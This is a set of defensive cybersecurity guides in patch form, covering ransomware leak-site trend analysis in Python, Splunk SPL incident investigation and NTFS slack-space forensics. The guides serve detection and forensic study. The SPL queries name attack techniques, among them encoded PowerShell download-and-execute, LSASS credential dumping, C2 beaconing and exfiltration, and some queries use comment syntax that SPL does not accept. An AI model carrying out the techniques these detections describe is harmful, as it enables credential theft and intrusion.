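from datetime import datetime, timedelta, timezone
from typing import Optional


def parse_discovered(value: str) -> Optional[datetime]:
    """Parse a feed timestamp into a timezone-aware UTC datetime, or None if unparseable."""
    if not value:
        return None
    try:
        parsed = datetime.fromisoformat(value.replace("Z", "+00:00"))
    except ValueError:
        return None
    if parsed.tzinfo is None:
        # Assumption: naive timestamps in the feed are already expressed in UTC.
        return parsed.replace(tzinfo=timezone.utc)
    return parsed.astimezone(timezone.utc)


def is_recent(value: str, days: int, now: Optional[datetime] = None) -> bool:
    """Return True if the timestamp falls within the last `days` days (UTC)."""
    now = now or datetime.now(timezone.utc)
    parsed = parse_discovered(value)
    return parsed is not None and parsed >= now - timedelta(days=days)
```

With these helpers, a recent-victims filter could reduce to `[p for p in posts if is_recent(p.get("discovered", ""), 30)]`.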
|
||||
|
||||
### Step 2: Analyze Group Activity and Trends
|
||||
|
||||
```python
|
||||
def analyze_group_trends(posts, top_n=15):
|
||||
"""Analyze ransomware group activity trends."""
|
||||
group_counts = Counter(p.get("group_name", "unknown") for p in posts)
|
||||
monthly_activity = {}
|
||||
|
||||
for post in posts:
|
||||
try:
|
||||
date = datetime.fromisoformat(
|
||||
post.get("discovered", "").replace("Z", "+00:00")
|
||||
)
|
||||
month_key = date.strftime("%Y-%m")
|
||||
group = post.get("group_name", "unknown")
|
||||
if month_key not in monthly_activity:
|
||||
monthly_activity[month_key] = Counter()
|
||||
monthly_activity[month_key][group] += 1
|
||||
except (ValueError, TypeError):
|
||||
continue
|
||||
|
||||
analysis = {
|
||||
"total_posts": len(posts),
|
||||
"unique_groups": len(group_counts),
|
||||
"top_groups": group_counts.most_common(top_n),
|
||||
"monthly_totals": {
|
||||
month: sum(counts.values())
|
||||
for month, counts in sorted(monthly_activity.items())
|
||||
},
|
||||
"monthly_top_groups": {
|
||||
month: counts.most_common(5)
|
||||
for month, counts in sorted(monthly_activity.items())
|
||||
},
|
||||
}
|
||||
|
||||
print(f"\n=== Ransomware Group Activity ===")
|
||||
print(f"Total victims tracked: {analysis['total_posts']}")
|
||||
print(f"Active groups: {analysis['unique_groups']}")
|
||||
print(f"\nTop {top_n} Groups:")
|
||||
for group, count in analysis["top_groups"]:
|
||||
print(f" {group}: {count} victims")
|
||||
|
||||
return analysis
|
||||
|
||||
trends = analyze_group_trends(collector.posts)
|
||||
```
|
||||
|
||||
### Step 3: Sector and Geographic Risk Assessment
|
||||
|
||||
```python
|
||||
def assess_sector_risk(posts, target_sector=None, target_country=None):
|
||||
"""Assess ransomware risk for specific sector or geography."""
|
||||
sector_data = {}
|
||||
country_data = {}
|
||||
|
||||
for post in posts:
|
||||
# Extract sector if available (not all feeds include this)
|
||||
sector = post.get("sector", post.get("industry", "unknown"))
|
||||
country = post.get("country", "unknown")
|
||||
|
||||
if sector not in sector_data:
|
||||
sector_data[sector] = {"count": 0, "groups": Counter(), "recent": []}
|
||||
sector_data[sector]["count"] += 1
|
||||
sector_data[sector]["groups"][post.get("group_name", "")] += 1
|
||||
|
||||
if country not in country_data:
|
||||
country_data[country] = {"count": 0, "groups": Counter()}
|
||||
country_data[country]["count"] += 1
|
||||
country_data[country]["groups"][post.get("group_name", "")] += 1
|
||||
|
||||
# Sector risk scoring
|
||||
total = len(posts)
|
||||
risk_assessment = {
|
||||
"total_victims": total,
|
||||
"sectors": {},
|
||||
"countries": {},
|
||||
}
|
||||
|
||||
for sector, data in sorted(sector_data.items(), key=lambda x: -x[1]["count"]):
|
||||
pct = (data["count"] / total * 100) if total > 0 else 0
|
||||
risk_assessment["sectors"][sector] = {
|
||||
"victim_count": data["count"],
|
||||
"percentage": round(pct, 1),
|
||||
"top_groups": data["groups"].most_common(5),
|
||||
"risk_level": (
|
||||
"critical" if pct > 15
|
||||
else "high" if pct > 8
|
||||
else "medium" if pct > 3
|
||||
else "low"
|
||||
),
|
||||
}
|
||||
|
||||
for country, data in sorted(country_data.items(), key=lambda x: -x[1]["count"]):
|
||||
pct = (data["count"] / total * 100) if total > 0 else 0
|
||||
risk_assessment["countries"][country] = {
|
||||
"victim_count": data["count"],
|
||||
"percentage": round(pct, 1),
|
||||
"top_groups": data["groups"].most_common(5),
|
||||
}
|
||||
|
||||
return risk_assessment
|
||||
|
||||
risk = assess_sector_risk(collector.posts)
|
||||
```
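Many public feeds carry no sector field, so the `unknown` bucket can dominate the percentages and push every real sector into the `low` band. The sketch below isolates the threshold logic from the function above and optionally drops unknown records before computing shares. The names `risk_level` and `sector_risk` and the `exclude_unknown` switch are illustrative assumptions; the thresholds are the ones used above.

```python
from collections import Counter


def risk_level(share_pct: float) -> str:
    """Map a sector's share of victims (in percent) to the bands used above."""
    if share_pct > 15:
        return "critical"
    if share_pct > 8:
        return "high"
    if share_pct > 3:
        return "medium"
    return "low"


def sector_risk(posts, exclude_unknown=True):
    """Compute per-sector victim share, optionally ignoring records without a sector."""
    sectors = Counter(
        p.get("sector") or p.get("industry") or "unknown" for p in posts
    )
    if exclude_unknown:
        sectors.pop("unknown", None)
    total = sum(sectors.values())
    result = {}
    for sector, count in sectors.most_common():
        pct = count / total * 100  # total > 0 whenever this loop body runs
        result[sector] = {
            "victim_count": count,
            "percentage": round(pct, 1),
            "risk_level": risk_level(pct),
        }
    return result
```

Whether to exclude unknown records is a judgment call: excluding them inflates the shares of labeled sectors, so a report should state which denominator was used.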
|
||||
|
||||
### Step 4: Track Emerging and Rebranding Groups
|
||||
|
||||
```python
|
||||
def track_new_groups(posts, lookback_days=90):
|
||||
"""Identify newly emerged ransomware groups."""
|
||||
group_first_seen = {}
|
||||
for post in posts:
|
||||
group = post.get("group_name", "")
|
||||
try:
|
||||
date = datetime.fromisoformat(
|
||||
post.get("discovered", "").replace("Z", "+00:00")
|
||||
)
|
||||
if group not in group_first_seen or date < group_first_seen[group]["first_seen"]:
|
||||
group_first_seen[group] = {
|
||||
"first_seen": date,
|
||||
"first_victim": post.get("post_title", ""),
|
||||
}
|
||||
except (ValueError, TypeError):
|
||||
continue
|
||||
|
||||
cutoff = datetime.now() - timedelta(days=lookback_days)
|
||||
new_groups = {
|
||||
group: info for group, info in group_first_seen.items()
|
||||
if info["first_seen"].replace(tzinfo=None) >= cutoff
|
||||
}
|
||||
|
||||
# Count total victims per new group
|
||||
for group in new_groups:
|
||||
victims = [p for p in posts if p.get("group_name") == group]
|
||||
new_groups[group]["total_victims"] = len(victims)
|
||||
new_groups[group]["avg_per_month"] = round(
|
||||
len(victims) / max(1, lookback_days / 30), 1
|
||||
)
|
||||
|
||||
print(f"\n=== New Groups (last {lookback_days} days) ===")
|
||||
for group, info in sorted(new_groups.items(), key=lambda x: -x[1]["total_victims"]):
|
||||
print(f" {group}: {info['total_victims']} victims, "
|
||||
f"first seen {info['first_seen'].strftime('%Y-%m-%d')}")
|
||||
|
||||
return new_groups
|
||||
|
||||
new_groups = track_new_groups(collector.posts, lookback_days=90)
|
||||
```
|
||||
|
||||
### Step 5: Generate Intelligence Report
|
||||
|
||||
```python
|
||||
def generate_ransomware_intel_report(trends, risk, new_groups):
|
||||
"""Generate ransomware threat intelligence report."""
|
||||
report = f"""# Ransomware Threat Intelligence Report
|
||||
Generated: {datetime.now().isoformat()}
|
||||
|
||||
## Executive Summary
|
||||
- **Total victims tracked**: {trends['total_posts']}
|
||||
- **Active ransomware groups**: {trends['unique_groups']}
|
||||
- **New groups (last 90 days)**: {len(new_groups)}
|
||||
|
||||
## Top Active Groups
|
||||
| Rank | Group | Victims |
|
||||
|------|-------|---------|
|
||||
"""
|
||||
for i, (group, count) in enumerate(trends["top_groups"][:10], 1):
|
||||
report += f"| {i} | {group} | {count} |\n"
|
||||
|
||||
report += "\n## New Emerging Groups\n"
|
||||
for group, info in sorted(new_groups.items(), key=lambda x: -x[1]["total_victims"])[:10]:
|
||||
report += f"- **{group}**: {info['total_victims']} victims since {info['first_seen'].strftime('%Y-%m-%d')}\n"
|
||||
|
||||
report += "\n## Sector Risk Assessment\n"
|
||||
report += "| Sector | Victims | % | Risk Level |\n|--------|---------|---|------------|\n"
|
||||
for sector, data in list(risk["sectors"].items())[:10]:
|
||||
report += f"| {sector} | {data['victim_count']} | {data['percentage']}% | {data['risk_level'].upper()} |\n"
|
||||
|
||||
report += """
|
||||
## Recommendations
|
||||
1. Monitor DLS feeds daily for your organization and supply chain partners
|
||||
2. Prioritize patching vulnerabilities exploited by top active groups
|
||||
3. Implement offline backup strategy to reduce extortion leverage
|
||||
4. Conduct tabletop exercises for ransomware scenario response
|
||||
5. Share indicators with sector ISACs and threat sharing communities
|
||||
"""
|
||||
with open("ransomware_intel_report.md", "w") as f:
|
||||
f.write(report)
|
||||
print("[+] Report saved: ransomware_intel_report.md")
|
||||
return report
|
||||
|
||||
generate_ransomware_intel_report(trends, risk, new_groups)
|
||||
```
|
||||
|
||||
## Validation Criteria
|
||||
|
||||
- Ransomware victim data ingested from public tracking feeds
|
||||
- Group activity trends analyzed with monthly breakdowns
|
||||
- Sector and geographic risk assessment produced
|
||||
- New and emerging groups identified with activity metrics
|
||||
- Intelligence report generated with actionable recommendations
|
||||
- All collection conducted through authorized public sources
|
||||
|
||||
## References
|
||||
|
||||
- [Ransomwatch GitHub](https://github.com/joshhighet/ransomwatch)
|
||||
- [SOCRadar: Top Ransomware Statistics 2025](https://socradar.io/blog/top-20-ransomware-statistics-to-know-2025/)
|
||||
- [Bitsight: Ransomware & Deep Web Trends](https://www.bitsight.com/underground/ransomware)
|
||||
- [Sophos: Threat Intelligence Report 2025](https://www.sophos.com/en-us/blog/threat-intelligence-executive-report-volume-2025-number-6)
|
||||
- [H-ISAC: Ransomware Data Leak Sites Report](https://www.aha.org/h-isac-green-reports/2025-08-26-h-isac-tlp-ransomware-data-leak-sites-report-august-26-2025)
|
||||
- [CYFIRMA: Weekly Intelligence Reports](https://www.cyfirma.com/news/weekly-intelligence-report-16-january-2026/)
|
||||
@@ -0,0 +1,238 @@
|
||||
---
|
||||
name: analyzing-security-logs-with-splunk
|
||||
description: >
|
||||
Leverages Splunk Enterprise Security and SPL (Search Processing Language) to
|
||||
investigate security incidents through log correlation, timeline reconstruction,
|
||||
and anomaly detection. Covers Windows event logs, firewall logs, proxy logs, and
|
||||
authentication data analysis. Activates for requests involving Splunk investigation,
|
||||
SPL queries, SIEM log analysis, security event correlation, or log-based incident
|
||||
investigation.
|
||||
domain: cybersecurity
|
||||
subdomain: incident-response
|
||||
tags: [splunk, SPL, SIEM, log-analysis, security-monitoring]
|
||||
version: 1.0.0
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Security Logs with Splunk
|
||||
|
||||
## When to Use
|
||||
|
||||
- Investigating a security incident that requires correlation across multiple log sources
|
||||
- Hunting for adversary activity using known TTPs and IOCs
|
||||
- Building detection rules for specific attack patterns
|
||||
- Reconstructing an incident timeline from disparate log sources
|
||||
- Analyzing authentication anomalies, lateral movement, or data exfiltration patterns
|
||||
|
||||
**Do not use** for real-time packet-level analysis; use Wireshark or Zeek for full packet capture analysis.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Splunk Enterprise or Splunk Cloud with Enterprise Security (ES) app installed
|
||||
- Log sources ingested: Windows Event Logs (via Splunk Universal Forwarder or WEF), firewall, proxy, DNS, EDR, email gateway
|
||||
- Splunk CIM (Common Information Model) data models configured for normalized field names
|
||||
- SPL proficiency at intermediate level or higher
|
||||
- Role-based access with `search` and `accelerate_search` capabilities in Splunk
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Scope the Investigation in Splunk
|
||||
|
||||
Define search parameters based on incident triage data:
|
||||
|
||||
```spl
|
||||
| Set initial investigation scope
|
||||
index=windows OR index=firewall OR index=proxy
|
||||
timeformat="%Y-%m-%dT%H:%M:%S" earliest="2025-11-14T00:00:00" latest="2025-11-16T00:00:00"
|
||||
(host="WKSTN-042" OR src_ip="10.1.5.42" OR user="jsmith")
|
||||
| stats count by index, sourcetype, host
|
||||
| sort -count
|
||||
```
|
||||
|
||||
This query establishes which log sources contain relevant data for the investigation timeframe and affected assets.
|
||||
|
||||
### Step 2: Analyze Authentication Events
|
||||
|
||||
Investigate suspicious authentication patterns using Windows Security Event Logs:
|
||||
|
||||
```spl
|
||||
| Detect brute force and credential stuffing
|
||||
index=windows sourcetype="WinEventLog:Security" EventCode=4625
|
||||
earliest=-24h
|
||||
| stats count as failed_attempts, values(src_ip) as source_ips,
|
||||
dc(src_ip) as unique_sources by TargetUserName
|
||||
| where failed_attempts > 10
|
||||
| sort -failed_attempts
|
||||
|
||||
| Detect pass-the-hash (Logon Type 9 - NewCredentials)
|
||||
index=windows sourcetype="WinEventLog:Security" EventCode=4624
|
||||
Logon_Type=9
|
||||
| table _time, host, TargetUserName, src_ip, LogonProcessName
|
||||
|
||||
| Detect lateral movement via RDP
|
||||
index=windows sourcetype="WinEventLog:Security" EventCode=4624
|
||||
Logon_Type=10
|
||||
| stats count, values(host) as targets by TargetUserName, src_ip
|
||||
| where count > 3
|
||||
| sort -count
|
||||
```
|
||||
|
||||
### Step 3: Trace Process Execution
|
||||
|
||||
Use Sysmon logs to reconstruct process execution chains:
|
||||
|
||||
```spl
|
||||
| Process creation with parent chain (Sysmon Event ID 1)
|
||||
index=sysmon EventCode=1 host="WKSTN-042"
|
||||
timeformat="%Y-%m-%dT%H:%M:%S" earliest="2025-11-15T14:00:00" latest="2025-11-15T15:00:00"
|
||||
| table _time, ParentImage, ParentCommandLine, Image, CommandLine, User, Hashes
|
||||
| sort _time
|
||||
|
||||
| Detect suspicious PowerShell execution
|
||||
index=sysmon EventCode=1 Image="*\\powershell.exe"
|
||||
(CommandLine="*-enc*" OR CommandLine="*-encodedcommand*"
|
||||
OR CommandLine="*downloadstring*" OR CommandLine="*iex*")
|
||||
| table _time, host, User, ParentImage, CommandLine
|
||||
| sort _time
|
||||
|
||||
| Detect LSASS credential dumping
|
||||
index=sysmon EventCode=10 TargetImage="*\\lsass.exe"
|
||||
GrantedAccess=0x1010
|
||||
| table _time, host, SourceImage, SourceUser, GrantedAccess
|
||||
```
|
||||
|
||||
### Step 4: Analyze Network Activity
|
||||
|
||||
Correlate network logs with endpoint events:
|
||||
|
||||
```spl
|
||||
| Detect C2 beaconing pattern
|
||||
index=proxy OR index=firewall dest_ip="185.220.101.42"
|
||||
| bin _time span=1m | stats count by _time, src_ip
|
||||
| where count > 0
|
||||
|
||||
| Detect DNS tunneling (high query volume to single domain)
|
||||
index=dns
|
||||
| rex field=query "(?<subdomain>[^\.]+)\.(?<domain>[^\.]+\.[^\.]+)$"
|
||||
| eval query_len=len(query) | stats count, avg(query_len) as avg_query_len by domain, src_ip
|
||||
| where count > 500 AND avg_query_len > 40
|
||||
| sort -count
|
||||
|
||||
| Detect large data transfers (potential exfiltration)
|
||||
index=proxy action=allowed
|
||||
| stats sum(bytes_out) as total_bytes by src_ip, dest_ip, dest_host
|
||||
| eval total_MB=round(total_bytes/1024/1024,2)
|
||||
| where total_MB > 100
|
||||
| sort -total_MB
|
||||
```
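Per-minute counts show that a host talks to a destination, but beaconing is usually recognized by how regular the gaps between connections are. The sketch below assumes the connection timestamps for one `src_ip`/`dest_ip` pair have been exported from Splunk as epoch seconds. The function names and the `max_jitter` threshold are illustrative assumptions, not tuned values.

```python
from statistics import mean, pstdev
from typing import Optional, Sequence


def interval_jitter(timestamps: Sequence[float], min_events: int = 6) -> Optional[float]:
    """Return the coefficient of variation of inter-arrival times.

    Returns None when there are too few events or all events share one timestamp.
    """
    if len(timestamps) < min_events:
        return None
    ordered = sorted(timestamps)
    intervals = [later - earlier for earlier, later in zip(ordered, ordered[1:])]
    average = mean(intervals)
    if average == 0:
        return None
    return pstdev(intervals) / average


def looks_like_beacon(timestamps: Sequence[float], max_jitter: float = 0.15) -> bool:
    """Flag traffic whose inter-arrival times are nearly constant."""
    jitter = interval_jitter(timestamps)
    return jitter is not None and jitter <= max_jitter
```

A low coefficient of variation only indicates regularity. Software update checks and monitoring agents also produce it, so results still need to be correlated with the endpoint events from Step 3.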
|
||||
|
||||
### Step 5: Build the Incident Timeline
|
||||
|
||||
Reconstruct a unified timeline across all log sources:
|
||||
|
||||
```spl
|
||||
| Unified incident timeline
|
||||
index=windows OR index=sysmon OR index=proxy OR index=firewall
|
||||
(host="WKSTN-042" OR src_ip="10.1.5.42" OR user="jsmith")
|
||||
timeformat="%Y-%m-%dT%H:%M:%S" earliest="2025-11-15T14:00:00" latest="2025-11-15T16:00:00"
|
||||
| eval event_summary=case(
|
||||
sourcetype=="WinEventLog:Security" AND EventCode==4624, "Logon: ".TargetUserName." from ".src_ip,
|
||||
sourcetype=="WinEventLog:Security" AND EventCode==4625, "Failed logon: ".TargetUserName,
|
||||
sourcetype=="XmlWinEventLog:Microsoft-Windows-Sysmon/Operational" AND EventCode==1,
|
||||
"Process: ".Image." by ".User,
|
||||
sourcetype=="proxy", "Web: ".http_method." ".url,
|
||||
1==1, sourcetype.": ".EventCode)
|
||||
| table _time, sourcetype, host, event_summary
|
||||
| sort _time
|
||||
```
|
||||
|
||||
### Step 6: Create Detection Rules
|
||||
|
||||
Convert investigation findings into persistent Splunk correlation searches:
|
||||
|
||||
```spl
|
||||
| Correlation search: PowerShell spawned by Office applications
|
||||
index=sysmon EventCode=1
|
||||
Image="*\\powershell.exe"
|
||||
(ParentImage="*\\winword.exe" OR ParentImage="*\\excel.exe"
|
||||
OR ParentImage="*\\outlook.exe")
|
||||
| eval severity="high"
|
||||
| eval mitre_technique="T1059.001"
|
||||
| collect index=notable_events
|
||||
```
|
||||
|
||||
## Key Concepts
|
||||
|
||||
| Term | Definition |
|
||||
|------|------------|
|
||||
| **SPL (Search Processing Language)** | Splunk's query language for searching, filtering, transforming, and visualizing machine data |
|
||||
| **CIM (Common Information Model)** | Splunk's field normalization standard that maps vendor-specific field names to common names for cross-source queries |
|
||||
| **Notable Event** | An event in Splunk Enterprise Security flagged for analyst review based on a correlation search match |
|
||||
| **Data Model** | Structured representation of indexed data in Splunk enabling accelerated searches and pivot-based analysis |
|
||||
| **Sourcetype** | Classification label in Splunk that defines the format and parsing rules for a specific log type |
|
||||
| **Correlation Search** | Scheduled Splunk search that runs continuously and generates notable events when conditions are met |
|
||||
| **Timechart** | SPL command that creates time-series visualizations for identifying patterns, anomalies, and trends |
|
||||
|
||||
## Tools & Systems
|
||||
|
||||
- **Splunk Enterprise Security (ES)**: Premium SIEM application providing correlation searches, risk-based alerting, and investigation workbench
|
||||
- **Splunk SOAR**: Orchestration platform integrated with Splunk ES for automated response playbooks
|
||||
- **Sysmon**: Microsoft system monitoring tool providing detailed process, network, and file change telemetry ingested into Splunk
|
||||
- **Splunk Attack Analyzer**: Automated threat analysis that detonates suspicious files and URLs, feeding results into Splunk
|
||||
- **BOSS of the SOC (BOTS)**: Splunk's publicly released capture-the-flag dataset for practicing incident investigation SPL queries
|
||||
|
||||
## Common Scenarios
|
||||
|
||||
### Scenario: Investigating Credential Stuffing Leading to Account Takeover
|
||||
|
||||
**Context**: Security operations receives an alert for multiple successful logins to a single account from geographically dispersed IP addresses within a 30-minute window.
|
||||
|
||||
**Approach**:
|
||||
1. Query Event ID 4624 for the affected account to map all login sources and times
|
||||
2. Correlate login IPs against threat intelligence feeds using a Splunk lookup table
|
||||
3. Check proxy logs for suspicious activity from the authenticated sessions
|
||||
4. Search for lateral movement from the compromised account (Event ID 4624 Type 3 to other hosts)
|
||||
5. Build a timeline showing credential stuffing attempts, successful login, and post-compromise activity
|
||||
6. Create a correlation search to detect similar patterns on other accounts
|
||||
|
||||
**Pitfalls**:
|
||||
- Searching only the last 24 hours when the credential stuffing may have occurred over weeks
|
||||
- Not checking for VPN logs that may show the same account authenticating from impossible travel distances
|
||||
- Failing to normalize timestamps across log sources in different time zones
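The time zone pitfall can be illustrated outside Splunk. The sketch below converts events exported from sources that log in different local times to UTC before merging them into one timeline. The function names, the event tuples, and the fixed UTC offsets are assumptions for illustration; fixed offsets ignore daylight saving changes, so a real workflow would use proper time zone data.

```python
from datetime import datetime, timedelta, timezone


def to_utc(local_ts: str, utc_offset_hours: float) -> datetime:
    """Interpret a naive ISO-8601 timestamp at the given UTC offset and convert it to UTC."""
    naive = datetime.fromisoformat(local_ts)
    source_zone = timezone(timedelta(hours=utc_offset_hours))
    return naive.replace(tzinfo=source_zone).astimezone(timezone.utc)


def merge_timeline(events, offsets):
    """Merge (source, local_timestamp, summary) tuples into one UTC-ordered timeline."""
    normalized = [
        (to_utc(local_ts, offsets[source]), source, summary)
        for source, local_ts, summary in events
    ]
    return sorted(normalized)


# Hypothetical events: the proxy logs in UTC-5, the domain controller in UTC.
events = [
    ("proxy", "2025-11-15T09:05:00", "Web: POST to external host"),
    ("windows", "2025-11-15T14:02:00", "Logon: jsmith"),
]
timeline = merge_timeline(events, {"proxy": -5, "windows": 0})
for when, source, summary in timeline:
    print(when.isoformat(), source, summary)
```

Sorted on raw strings, the proxy event would appear five hours before the logon. After normalization it correctly follows the logon by three minutes.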
|
||||
|
||||
## Output Format
|
||||
|
||||
```
|
||||
SPLUNK INVESTIGATION REPORT
|
||||
============================
|
||||
Incident: INC-2025-1547
|
||||
Analyst: [Name]
|
||||
Investigation Period: 2025-11-14 00:00 UTC - 2025-11-16 00:00 UTC
|
||||
|
||||
SEARCH SCOPE
|
||||
Indexes: windows, sysmon, proxy, firewall, dns
|
||||
Hosts: WKSTN-042, SRV-FILE01
|
||||
Users: jsmith, svc-backup
|
||||
Source IPs: 10.1.5.42, 10.1.10.15
|
||||
|
||||
KEY FINDINGS
|
||||
1. [timestamp] - Initial compromise via phishing (Sysmon Event 1)
|
||||
2. [timestamp] - C2 established (proxy logs, beacon pattern detected)
|
||||
3. [timestamp] - Credential theft (Sysmon Event 10, LSASS access)
|
||||
4. [timestamp] - Lateral movement to SRV-FILE01 (Event 4624 Type 3)
|
||||
5. [timestamp] - Data staging and exfiltration (proxy bytes_out anomaly)
|
||||
|
||||
SPL QUERIES USED
|
||||
[numbered list of key queries with descriptions]
|
||||
|
||||
DETECTION GAPS IDENTIFIED
|
||||
- No Sysmon deployed on SRV-FILE01 (blind spot)
|
||||
- Proxy logs missing SSL inspection for C2 domain
|
||||
- PowerShell ScriptBlock logging not enabled
|
||||
|
||||
RECOMMENDED DETECTIONS
|
||||
1. Correlation search for Office-spawned PowerShell
|
||||
2. Threshold alert for LSASS access patterns
|
||||
3. Behavioral rule for beacon-interval network traffic
|
||||
```
|
||||
@@ -0,0 +1,382 @@
|
||||
---
|
||||
name: analyzing-slack-space-and-file-system-artifacts
|
||||
description: Examine file system slack space, MFT entries, USN journal, and alternate data streams to recover hidden data and reconstruct file activity on NTFS volumes.
|
||||
domain: cybersecurity
|
||||
subdomain: digital-forensics
|
||||
tags: [forensics, slack-space, ntfs, mft, usn-journal, alternate-data-streams, file-system-analysis]
|
||||
version: "1.0"
|
||||
author: mahipal
|
||||
license: MIT
|
||||
---
|
||||
|
||||
# Analyzing Slack Space and File System Artifacts
|
||||
|
||||
## When to Use
|
||||
- When searching for hidden or residual data in file system slack space
|
||||
- When analyzing NTFS Master File Table (MFT) entries for deleted file metadata
|
||||
- When reconstructing file operations from the USN Change Journal
|
||||
- When detecting Alternate Data Streams (ADS) used to hide data or malware
|
||||
- During deep forensic analysis requiring examination beyond standard file recovery
|
||||
|
||||
## Prerequisites
|
||||
- Forensic disk image with NTFS file system
|
||||
- The Sleuth Kit (TSK) tools: istat, icat, fls, blkls, blkstat
|
||||
- MFTECmd (Eric Zimmerman) for MFT parsing
|
||||
- MFTExplorer for interactive MFT analysis
|
||||
- Understanding of NTFS structures (MFT, $UsnJrnl, $LogFile, ADS)
|
||||
- Python with analyzeMFT or mft library for automated parsing
|
||||
|
||||
## Workflow
|
||||
|
||||
### Step 1: Identify and Extract NTFS File System Artifacts
|
||||
|
||||
```bash
|
||||
# Determine partition layout
|
||||
mmls /cases/case-2024-001/images/evidence.dd
|
||||
|
||||
# Extract key NTFS system files
|
||||
# $MFT - Master File Table
|
||||
icat -o 2048 /cases/case-2024-001/images/evidence.dd 0 > /cases/case-2024-001/ntfs/MFT
|
||||
|
||||
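# $UsnJrnl:$J - USN Change Journal (the entry number varies per volume; list $Extend with `fls -o 2048 <image> 11` and use the inode-type-id shown for $UsnJrnl:$J)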
|
||||
icat -o 2048 /cases/case-2024-001/images/evidence.dd 62-128 > /cases/case-2024-001/ntfs/UsnJrnl_J
|
||||
|
||||
# $LogFile - Transaction log
|
||||
icat -o 2048 /cases/case-2024-001/images/evidence.dd 2 > /cases/case-2024-001/ntfs/LogFile
|
||||
|
||||
# Extract all slack space from the volume
|
||||
blkls -s -o 2048 /cases/case-2024-001/images/evidence.dd > /cases/case-2024-001/ntfs/slack_space.raw
|
||||
|
||||
# Get file system information
|
||||
fsstat -o 2048 /cases/case-2024-001/images/evidence.dd | tee /cases/case-2024-001/ntfs/fs_info.txt
|
||||
```
|
||||
|
||||
### Step 2: Analyze the Master File Table (MFT)
|
||||
|
||||
```bash
|
||||
# Parse MFT with MFTECmd (Eric Zimmerman)
|
||||
MFTECmd.exe -f "C:\cases\ntfs\MFT" --csv "C:\cases\analysis" --csvf mft_analysis.csv
|
||||
|
||||
# Parse with analyzeMFT (Python)
|
||||
pip install analyzeMFT
|
||||
|
||||
analyzeMFT.py -f /cases/case-2024-001/ntfs/MFT \
|
||||
-o /cases/case-2024-001/analysis/mft_analysis.csv \
|
||||
-c
|
||||
|
||||
# Custom MFT analysis with Python
|
||||
python3 << 'PYEOF'
|
||||
from mft import PyMft
|
||||
import csv
|
||||
|
||||
mft = PyMft(open('/cases/case-2024-001/ntfs/MFT', 'rb').read())
|
||||
|
||||
deleted_files = []
|
||||
suspicious_files = []
|
||||
|
||||
for entry in mft.entries():
|
||||
if entry is None:
|
||||
continue
|
||||
|
||||
filename = entry.get_filename()
|
||||
if filename is None:
|
||||
continue
|
||||
|
||||
is_deleted = not entry.is_active()
|
||||
is_directory = entry.is_directory()
|
||||
created = entry.get_created_timestamp()
|
||||
modified = entry.get_modified_timestamp()
|
||||
mft_modified = entry.get_mft_modified_timestamp()
|
||||
size = entry.get_file_size()
|
||||
|
||||
# Flag deleted files for recovery
|
||||
if is_deleted and not is_directory and size > 0:
|
||||
deleted_files.append({
|
||||
'filename': filename,
|
||||
'size': size,
|
||||
'created': str(created),
|
||||
'modified': str(modified),
|
||||
'entry_number': entry.entry_number
|
||||
})
|
||||
|
||||
# Detect timestomping ($STANDARD_INFORMATION modified time differs from $FILE_NAME modified time)
|
||||
si_modified = entry.get_si_modified_timestamp()
|
||||
fn_modified = entry.get_fn_modified_timestamp()
|
||||
if si_modified and fn_modified:
|
||||
if abs((si_modified - fn_modified).total_seconds()) > 86400: # >1 day difference
|
||||
suspicious_files.append({
|
||||
'filename': filename,
|
||||
'si_modified': str(si_modified),
|
||||
'fn_modified': str(fn_modified),
|
||||
'delta': str(si_modified - fn_modified)
|
||||
})
|
||||
|
||||
print(f"=== DELETED FILES (recoverable metadata) ===")
|
||||
print(f"Total: {len(deleted_files)}")
|
||||
for f in deleted_files[:20]:
|
||||
print(f" [{f['modified']}] {f['filename']} ({f['size']} bytes)")
|
||||
|
||||
print(f"\n=== POTENTIAL TIMESTOMPING ===")
|
||||
print(f"Total suspicious: {len(suspicious_files)}")
|
||||
for f in suspicious_files[:10]:
|
||||
print(f" {f['filename']}: $SI={f['si_modified']}, $FN={f['fn_modified']} (delta: {f['delta']})")
|
||||
PYEOF
|
||||
```
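The one-day delta on modified times used above tends to be noisy. $FILE_NAME timestamps are generally updated only on creation, rename, or move, so a later $STANDARD_INFORMATION modified time is normal for any file edited after it was created. The sketch below shows two creation-time heuristics that are commonly cited in forensic literature. They are not taken from the script above, the function name is hypothetical, and both can produce false positives (for example, files restored from archives or copied by tools that keep only whole-second precision).

```python
from datetime import datetime
from typing import List


def timestomp_indicators(si_created: datetime, fn_created: datetime) -> List[str]:
    """Return heuristic timestomping indicators for one MFT entry.

    si_created: creation time from $STANDARD_INFORMATION (easily changed by user-mode tools)
    fn_created: creation time from $FILE_NAME (normally written only by the file system)
    """
    findings = []
    if si_created < fn_created:
        # $SI claims the file existed before its name entry was created.
        findings.append("si_created_before_fn_created")
    if si_created.microsecond == 0:
        # NTFS stores 100 ns precision; an exact whole second is unusual but not impossible.
        findings.append("si_created_zero_subsecond")
    return findings
```

Entries that trigger both indicators are reasonable candidates for manual review against the USN Journal and $LogFile.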
|
||||
|
||||
### Step 3: Analyze Slack Space for Hidden Data
|
||||
|
||||
```bash
|
||||
# Search slack space for strings
|
||||
strings -a /cases/case-2024-001/ntfs/slack_space.raw > /cases/case-2024-001/analysis/slack_strings.txt
|
||||
|
||||
# Search for specific patterns in slack space
|
||||
grep -iab "password\|secret\|confidential\|credit.card\|ssn" \
|
||||
/cases/case-2024-001/ntfs/slack_space.raw > /cases/case-2024-001/analysis/slack_keywords.txt
|
||||
|
||||
# Analyze individual file slack
|
||||
python3 << 'PYEOF'
|
||||
import struct
|
||||
|
||||
# File slack consists of:
|
||||
# 1. RAM slack: bytes between file end and next sector boundary (filled with RAM content or zeros)
|
||||
# 2. Drive slack: remaining sectors in the cluster after the last file sector
|
||||
|
||||
# Analyze slack for specific MFT entries
|
||||
# Using Sleuth Kit to get file slack for a specific file
|
||||
import subprocess
|
||||
|
||||
# Get file details
|
||||
result = subprocess.run(
|
||||
['istat', '-o', '2048', '/cases/case-2024-001/images/evidence.dd', '14523'],
|
||||
capture_output=True, text=True
|
||||
)
|
||||
print(result.stdout)
|
||||
|
||||
# The output shows data runs - the last cluster may contain slack data
|
||||
# Calculate slack size: (allocated_size - file_size) bytes
|
||||
PYEOF
|
||||
|
||||
# Search for file signatures in slack space (embedded files)
|
||||
